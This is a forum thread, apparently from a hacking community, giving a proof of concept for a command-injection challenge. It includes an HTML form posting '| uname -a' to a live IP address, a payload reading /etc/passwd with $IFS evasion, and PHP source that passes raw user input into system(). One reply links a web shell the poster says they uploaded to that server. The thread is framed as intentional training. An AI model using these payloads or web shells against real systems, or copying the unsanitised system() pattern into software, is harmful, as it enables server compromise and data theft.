ST03: injection Challenge (POC and Source Code)

Hack The Box Challenge
1

POC I (RCE/OS Command Injection Vulnerability)

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://104.129.171.125/ST3/index.php" method="POST">
<input type="hidden" name="str" value="&#124;&#32;uname&#32;&#45;a" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Screenshot:

image
image762×638 65.4 KB

POC II (RCE/OS Command Injection Vulnerability)

Search by: ;cat$IFS$9/etc/passwd;

Screenshot

image
image762×638 76 KB

Source Code:

<!doctype html>
<html lang='en'>
<head>
    <meta charset="utf-8">
    <title>ST3</title>
</head>
<body><center>
<img src="https://i.giphy.com/media/pPhyAv5t9V8djyRFJH/200_d.gif">
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
  কি দেখাবা দেখাও... : <br><br>
  <input type="text" name="str" value="">
  <br>
  <input type="submit" value="Check">
</form>
</center></body>
</html>

<?php
$server = $_POST['str'];
if (isset($server)) {
    $status = system("/bin/ping -c 4 $server");
if ($status)
    echo "<center><br><br> <h2>সার্ভার জীবিত !!</h2></<center>";
else
    echo "<center><br><br> <h2>এইডা কিছু হইলো !!</h2></<center>";
}
system("killall -q ping");
?>

Thanks :slight_smile:

4 Likes
2

Thanks a lot bro… we love you bro… :hearts:

1 Like
3

wow great, :blush:

1 Like
4

thanks
http://104.129.171.125/ST3/alfav3-encoded.php
Shell upload kre dilam :wink: @1337
Vlo laglo again thanks :wink:

2 Likes
5

Wonderful work @Joy
This server is open to hack and anyone can do his research by hacking it though our challenges. This RCE, we left on this server is completely intentionally so that you can learn and feel the real excitement of doing your wonderful works. We also believe, you will not delete the challenges to stop other peoples learning.

Thanks!

2 Likes
6

thanks @1337
Ok
:wink:

7

#Respect:+1:

8

The sell is not working bro… it shows ‘Windows NT’ btw the server is Linux

9

Problem in server not shell bro